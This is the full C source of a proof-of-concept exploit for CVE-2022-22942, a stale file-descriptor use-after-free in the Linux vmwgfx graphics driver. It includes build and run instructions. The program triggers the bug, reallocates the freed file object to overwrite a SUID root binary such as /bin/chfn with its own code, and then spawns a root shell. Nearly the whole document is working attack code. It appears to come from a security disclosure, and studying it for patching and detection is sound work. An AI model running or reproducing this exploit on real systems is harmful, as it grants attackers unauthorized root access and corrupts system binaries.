cve-2022-22942-dc.c

/* The vmwgfx driver has a similar bug as the one we fixed last year in the
 * nitro enclaves code (https://git.kernel.org/linus/f1ce3986baa6
 * "nitro_enclaves: Fix stale file descriptors on failed usercopy").
 *
 * If the driver fails to copy the 'fence_rep' object to userland, it tries to
 * recover by deallocating the (already populated) file descriptor. This is
 * wrong, as the fd gets released via put_unused_fd() which shouldn't be used,
 * as the fd table slot was already populated via the previous call to
 * fd_install(). This leaves userland with a valid fd table entry pointing to
 * a free'd 'file' object.
 *
 * There are multiple ways to exploit this bug. A previous version of this PoC
 * dumped the contents of /etc/shadow. This one overwrites a SUID root binary
 * to pop a shell.
 *
 * Compile as:
 *   $ gcc -O2 cve-2022-22942-dc.c -o cve-2022-22942-dc
 *
 * Run as (and wait for the root shell to appear):
 *   $ ./cve-2022-22942-dc [target_file [temp_file [dev_node]]]
 *
 * Remarks:
 *
 * This POC assumes it has access to '/dev/dri/card0' which likely means the
 * calling user needs to be part of the 'video' group.
 *
 * Alternatively '/dev/dri/renderD128' can be used (just pass the path as
 * argument to ./cve-2022-22942-dc-dc), which, under Debian, means being part
 * of the 'render' group.
 *
 * This bug was fixed by commit a0f90c881570 ("drm/vmwgfx: Fix stale file
 * descriptors on failed usercopy"). It affected kernel versions v4.14-rc1 to
 * v5.17-rc1.
 *
 * This is CVE-2022-22942.
 *
 * (c) 2022 Open Source Security, Inc.
 *
 * - minipli
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */

#define _GNU_SOURCE
#include <sys/sysmacros.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <err.h>

/* uapi/drm/drm.h */
#define DRM_IOCTL_BASE		'd'
#define DRM_IOW(nr,type)	_IOW(DRM_IOCTL_BASE,nr,type)
#define DRM_IOWR(nr,type)	_IOWR(DRM_IOCTL_BASE,nr,type)
#define DRM_COMMAND_BASE	0x40

#define DRM_IOCTL_VERSION	DRM_IOWR(0x00, struct drm_version)
struct drm_version {
	int version_major;
	int version_minor;
	int version_patchlevel;
	size_t name_len;
	char *name;
	size_t date_len;
	char *date;
	size_t desc_len;
	char *desc;
};

/* uapi/drm/vmwgfx_drm.h */
#define DRM_VMW_EXECBUF							12
#define DRM_VMW_EXECBUF_VERSION					2
#define DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD	(1 << 1)
#define DRM_VMW_INVALID_CTX_HNDL				(-1)

#define DRM_IOCTL_VMW_EXECBUF \
	 DRM_IOW(DRM_COMMAND_BASE + DRM_VMW_EXECBUF, struct drm_vmw_execbuf_arg)
struct drm_vmw_execbuf_arg {
	uint64_t commands;
	uint32_t command_size;
	uint32_t throttle_us;
	uint64_t fence_rep;
	uint32_t version;
	uint32_t flags;
	uint32_t context_handle;
	int32_t imported_fence_fd;
};

#define array_size(x)	(sizeof(x)/sizeof*(x))

#define FENCE_REP_PTR		0x42
#define VMWGFX_DRV_NAME		"vmwgfx"
#define VMWGFX_DEV			"/dev/dri/card0"
#define NULL_DEV			"/dev/null"
#define SUID_TARGET			"/bin/chfn"	// use /bin/chage for RHEL/CentOS
#define TEMP_FILE			"/var/tmp/cake"

static char *suid_path = SUID_TARGET;
static char *temp_path = TEMP_FILE;
static char *dev_path = VMWGFX_DEV;
static char stale_fd_path[64];

static const void *prog_addr, *suid_addr;
static size_t prog_size, suid_size;

#define NUM_FILES 32
static int files[NUM_FILES];

static void open_files(const char *path, int flags, mode_t mode, bool temp) {
	unsigned int i;

	for (i = 0; i < array_size(files); i++) {
		files[i] = open(path, flags, mode);
		if (files[i] < 0)
			err(1, "open('%s', %hx, %hx)", path, flags, mode);

		if (temp) {
			unlink(path);

			if (ftruncate(files[i], prog_size))
				err(1, "ftruncate()");
		}
	}
}

static void close_files(unsigned int except) {
	unsigned int i;

	for (i = 0; i < array_size(files); i++) {
		if ((unsigned int)files[i] == except)
			continue;

		if (close(files[i]))
			err(1, "close(fd=%d)", files[i]);
	}
}

static int find_file(ino_t ino) {
	struct stat buf;
	unsigned int i;

	for (i = 0; i < array_size(files); i++) {
		if (fstat(files[i], &buf))
			err(1, "stat(fd=%d)", files[i]);

		if (buf.st_ino == ino)
			return files[i];
	}

	return -1;
}

static bool is_suid(const char *path) {
	struct stat buf;

	if (stat(path, &buf))
		return false;

	return buf.st_uid == 0 && (buf.st_mode & 04111) == 04111;
}

static bool pin_cpu(int cpu) {
    cpu_set_t cpus;

    CPU_ZERO(&cpus);
    CPU_SET(cpu, &cpus);

    return !!sched_setaffinity(0, sizeof(cpus), &cpus);
}

static void *map_file(const char *path, size_t *len) {
	struct stat sb;
	void *addr;
	size_t i;
	int fd;

	printf("[~] creating r/o mapping of %s...\n", path);
	fd = open(path, O_RDONLY);
	if (fd < 0)
		err(1, "open(%s)", path);

	if (fstat(fd, &sb))
		err(1, "stat(%s)", path);

	*len = sb.st_size;
	addr = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
	if (addr == MAP_FAILED)
		err(1, "mmap(%s)", path);

	/* fault in the pages to pre-load the binary */
	for (i = 0; i < *len; i += 4096)
		*(volatile char *)(addr + i);

	close(fd);

	return addr;
}

static int get_stale_fd(const char *dev_path) {
	static char name[256], date[256], desc[256];
	static struct drm_version drm_info = {
		.name = name, .name_len = sizeof(name),
		.desc = desc, .desc_len = sizeof(desc),
		.date = date, .date_len = sizeof(date),
	};
	static struct drm_vmw_execbuf_arg exec_buf = {
		.version = DRM_VMW_EXECBUF_VERSION,
		.context_handle = DRM_VMW_INVALID_CTX_HNDL,
		.flags = DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD,
		.fence_rep = FENCE_REP_PTR,
	};
	static int vmw_fd = -1;
	int fd;

	if (vmw_fd < 0) {
		printf("[~] vmwgfx setup using %s...\n", dev_path);
		vmw_fd = open(dev_path, O_WRONLY);
		if (vmw_fd < 0)
			err(1, "open(%s)", dev_path);

		if (ioctl(vmw_fd, DRM_IOCTL_VERSION, &drm_info) != 0)
			err(1, "ioctl(DRM_IOCTL_VERSION) unexpectedly failed");

		if (strcmp(drm_info.name, VMWGFX_DRV_NAME) != 0) {
			errx(1, "wrong driver, should be '%s' but is '%s'",
			     VMWGFX_DRV_NAME, drm_info.name);
		}
		printf("[+] confirmed to be targeting the right driver\n");
	}

	fd = open(NULL_DEV, O_RDONLY);
	if (fd < 0)
		err(1, "open(%s)", NULL_DEV);
	close(fd);
	printf("[~] predicted fence fd = %d\n", fd);
	snprintf(stale_fd_path, sizeof(stale_fd_path), "/proc/self/fd/%d", fd);

	printf("[~] triggering fence fd export...\n");
	if (ioctl(vmw_fd, DRM_IOCTL_VMW_EXECBUF, &exec_buf) != 0)
		err(1, "ioctl(DRM_IOCTL_VMW_EXECBUF) unexpectedly failed");

	return fd;
}

static bool check_fd(int fd, const char *path, ino_t *ino) {
	char buf[1024];
	struct stat sb;
	ssize_t len;

	/* Do non-faulting checks first -- using an invalid address ;) */
	errno = 0;
	if (write(fd, (void *)~0xdead, 42) >= 0 || errno != EFAULT)
		return false;

	/* We open the file with exactly these flags */
	if ((fcntl(fd, F_GETFL) & O_RDWR) != O_RDWR)
		return false;

	len = readlink(stale_fd_path, buf, sizeof(buf) - 1);
	if (len < 0)
		return false;

	buf[len] = '\0';
	if (strncmp(buf, path, strlen(path)) != 0)
		return false;

	if (fstat(fd, &sb) != 0)
		return false;

	*ino = sb.st_ino;

	return true;
}

static void __read_pipe(int fd, void *buf, size_t len, const char *what, const char *caller) {
	ssize_t cnt;

	cnt = read(fd, buf, len);
	if (cnt < 0)
		err(1, "%s: read(%s)", caller, what);

	if (cnt == 0)
		errx(2, "%s: read(%s) EOF, other side died?", caller, what);

	if ((size_t)cnt != len)
		errx(1, "%s: short read(%s): got %zd, want %zu", caller, what, cnt, len);
}
#define read_pipe(p,o)	__read_pipe(p[0], &o, sizeof(o), #o, __func__)

static void __write_pipe(int fd, const void *buf, size_t len, const char *what, const char *caller) {
	ssize_t cnt;

	cnt = write(fd, buf, len);
	if (cnt < 0)
		err(1, "%s: write(%s)", caller, what);

	if (cnt == 0)
		errx(2, "%s: write(%s) EOF, other side died?", caller, what);

	if ((size_t)cnt != len)
		errx(1, "%s: short write(%s): got %zd, want %zu", caller, what, cnt, len);
}
#define write_pipe(p,o)	__write_pipe(p[1], &o, sizeof(o), #o, __func__)

static void stale_fd_worker(int pipe[2]) {
	bool write_ino = false;
	int stale_fd = -1;
	char state = '0';
	ino_t ino;

	do {
		switch (state) {
			case '0':
				stale_fd = get_stale_fd(dev_path);
				/* ensure an RCU GP has passed and the file was returned to the cache */
//				usleep(150 * 1000);
				sleep(1);
				printf("[~] RCU GP passed and file object released -- by now or soon!\n");
				state++;
				break;

			case '2':
				printf("[~] probing stale fd for a match...\n");
				if (check_fd(stale_fd, temp_path, &ino)) {
					write_ino = true;
					state++;
				} else {
					state--;
				}
				break;

			case '4':
				printf("[~] closing stale fd...\n");
				/* This close will drop the reference of the mmap() of stage
				 * '3' and make its file pointer dangling.
				 */
				close(stale_fd);

				/* ensure an RCU GP has passed and the file was released to the cache */
//				usleep(150 * 1000);
				sleep(1);
				printf("[~] RCU GP passed and file object released again -- hopefully!\n");
				state++;
				break;

			default:
				errx(1, "%s: invalid state '%c'", __func__, state);
		}

		write_pipe(pipe, state);
		if (write_ino) {
			write_ino = false;
			write_pipe(pipe, ino);
		}
		read_pipe(pipe, state);
	} while (state < '6');

	printf("[~] %s: done\n", __func__);
	exit(memcmp(suid_addr, prog_addr, prog_size));
}

static void mmap_worker(int pipe[2]) {
	bool files_open = false;
	void *addr = NULL;
	sigset_t set;
	char state;
	ino_t ino;
	int fd;

	do {
		read_pipe(pipe, state);

		switch (state) {
			case '1':
				if (files_open) {
					files_open = false;
					close_files(-1);
					usleep(20 * 1000);
				}
				printf("[~] opening some r/w files for %s\n", temp_path);
				open_files(temp_path, O_RDWR | O_CREAT | O_TRUNC, 0600, true);
				files_open = true;
				state++;
				break;

			case '3':
				/* found it! */
				read_pipe(pipe, ino);

				fd = find_file(ino);
				if (fd < 0) {
					printf("[-] failed to find candidate with ino %#lx, retrying\n", ino);
					state = '1';
					/* no need to bounce, retry directly */
					continue;
				}

				printf("[+] found match at fd %d\n", fd);
				close_files(fd);

				printf("[~] creating r/w mapping...\n");
				addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
				if (addr == MAP_FAILED)
					err(1, "mmap()");

				close(fd);
				state++;
				break;

			case '5':
				printf("[~] opening some r/o files for %s\n", suid_path);
				open_files(suid_path, O_RDONLY, 0, false);

				/* We hope to have reallocated the dangling file once more! */
				printf("[*] trying to overwrite code in %s\n", suid_path);
				memcpy(addr, prog_addr, prog_size);
				//msync(addr, prog_size, MS_SYNC | MS_INVALIDATE);
				printf("[~] %s: done\n", __func__);
				state++;
				break;

			default:
				errx(1, "%s: invalid state '%c'", __func__, state);
		}

		write_pipe(pipe, state);
	} while (state < '6');

	/* The 'addr' mapping is using a dangling file pointer, i.e. one with an
	 * off-by-one reference count. Terminating the process will thereby lead to
	 * a warning in the vfs code: "VFS: Close: file count is 0" or worse,
	 * tripping over DEBUG_LIST checks leading to an Oops.
	 *
	 * To avoid these, turn into a ghost, detach from the process hierachy and
	 * daemonize.
	 */
	//exit(memcmp(suid_addr, prog_addr, prog_size));

	setsid();

	close(0);
	close(1);
	close(2);
	close(pipe[0]);
	close(pipe[1]);
	prctl(PR_SET_NAME, "bogeyman", 0, 0, 0);

    sigfillset(&set);
    sigprocmask(SIG_BLOCK, &set, NULL);

	for (;;)
		pause();
}

static void spawn_worker(void) {
	int state_fd[2][2];

	if (pipe(state_fd[0]) < 0 || pipe(state_fd[1]) < 0)
		err(1, "pipe()");

	switch (fork()) {
		default:
			close(state_fd[0][1]);
			close(state_fd[1][0]);
			stale_fd_worker((int [2]) { state_fd[0][0], state_fd[1][1] });
			break;

		case 0:
			close(state_fd[0][0]);
			close(state_fd[1][1]);
			mmap_worker((int [2]) { state_fd[1][0], state_fd[0][1] });
			break;

		case -1:
			err(1, "fork()");
	}

	/* not reached */
	exit(1);
}

int main(int argc, char **argv) {
	static const char proc_self_exe[] = "/proc/self/exe";

	if (!getuid())
		errx(1, "ahem...");

	if (!geteuid()) {
		setuid(0);
		setgid(0);
		execve("/bin/sh", (char *const []){ "-sh", NULL }, NULL);
		err(1, "execve(%s)", SUID_TARGET);
	}

	if (argc >= 2)
	    suid_path = argv[1];

	if (argc >= 3)
	    temp_path = argv[2];

	if (argc >= 4)
	    dev_path = argv[3];

	if (!is_suid(suid_path))
		errx(1, "%s isn't suid root, choose another target", suid_path);

	suid_addr = map_file(suid_path, &suid_size);
	prog_addr = map_file(proc_self_exe, &prog_size);

	if (suid_size < prog_size) {
		errx(1, "size of %s too small, need %zuB, but only have %zuB",
		     suid_path, prog_size, suid_size);
	}

	/* Ensure all subprocesses share the same SLUB's partial lists */
	if (pin_cpu(sched_getcpu()))
        err(1, "failed to pin to CPU");

	/* Span two subprocesses that lock step a state machine:
	 * P1: triggers the bug to get a stale fd entry
	 *
	 * P2: opens a bunch of r/w temporary files to reallocate the file object
	 *
	 * P1: checks if one of the fds reallocated the dangling file pointer and
	 *     signals P2 which
	 *
	 * P2: creates a r/w mapping of the fd that matches the reallocated file
	 *     pointer and closes all opened files
	 *
	 * P1: uses its stale fd entry to put the file attached to P2's mapping to
	 *     make it dangling again
	 *
	 * P2: opens the target file r/o multiple times to reallocate the just
	 *     released file object
	 * P2: copies this program over the previously created mapping (now
	 *     pointing to the victim file instead of the temporary file)
	 *
	 * P1: signals success / failure to the observer by checking if the victim
	 *     file was overwritten
	 *
	 * Wait for them to exit / die and check the return status. If it's zero,
	 * terminate the loop, we're done.
	 */

	/* Do the dirty work in subprocesses, to not accidentally die along */
	printf("[~] spawning helper processes...\n");
	switch (fork()) {
		case -1: err(1, "fork()");
		case  0: spawn_worker();
	}

retry:	/* Reap all the zombies... */
	switch (wait(NULL)) {
		case -1:
			switch (errno) {
				case EINTR: goto retry;
				case ECHILD: break;
				default: err(1, "wait()");
			}
			break;
		default:
			/* continue reaping... */
			goto retry;
	}

	if (memcmp(suid_addr, prog_addr, prog_size))
		errx(1, "failed to overwrite %s :(", suid_path);

	printf("[$] success, spawning shell...\n");

	/* Should be a suid root version of us by now */
	execve(suid_path, (char *const []){ suid_path, NULL }, NULL);
	err(1, "execve(%s)", suid_path);

	return 0;
}